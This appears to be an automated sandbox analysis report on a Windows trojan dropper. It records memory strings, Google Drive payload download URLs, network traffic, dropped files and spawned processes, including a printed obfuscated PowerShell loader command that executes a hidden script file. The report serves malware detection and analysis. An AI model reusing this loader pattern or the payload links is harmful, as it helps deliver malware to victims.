    Source: msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avP7
    Source: msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avPZ#G
    Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCIktL_zQq9z-avPZ#w
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPCK
    Source: msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPG
    Source: msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPGJ
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avPP
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=downloadt
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466770656.0000000008030000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161884513.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220342182.0000000008030000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2065182064.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2122487981.0000000008037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
    Source: msiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065182064.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2122487981.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185564841.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2076123586.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065019637.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087938810.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2146809082.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147213689.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2135828611.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185564841.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172727495.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2076123586.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2065019637.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087938810.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2146809082.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147213689.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123795079.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.2135828611.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49974 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49975 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49976 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49978 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49980 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49982 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49986 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49988 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49990 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49994 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49996 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49998 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50002 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50004 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50010 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50012 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50014 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50016 version: TLS 1.2
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Code function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

    System Summary

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exeJump to dropped file
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004031DD
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004049760_2_00404976
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004064EC0_2_004064EC
    Source: YrCSUX2O3I.exeStatic PE information: invalid certificate
    Source: YrCSUX2O3I.exe, 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs YrCSUX2O3I.exe
    Source: YrCSUX2O3I.exeBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs YrCSUX2O3I.exe
    Source: YrCSUX2O3I.exe.2.drBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs YrCSUX2O3I.exe
    Source: YrCSUX2O3I.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/15@2/2
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404430
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile created: C:\Users\user\AppData\Roaming\PolysulfonateJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_03
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile created: C:\Users\user\AppData\Local\Temp\nshF4D7.tmpJump to behavior
    Source: YrCSUX2O3I.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: YrCSUX2O3I.exeVirustotal: Detection: 59%
    Source: YrCSUX2O3I.exeReversingLabs: Detection: 57%
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeFile read: C:\Users\user\Desktop\YrCSUX2O3I.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\YrCSUX2O3I.exe "C:\Users\user\Desktop\YrCSUX2O3I.exe"
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\YrCSUX2O3I.exe | Section loaded: usp10.dll
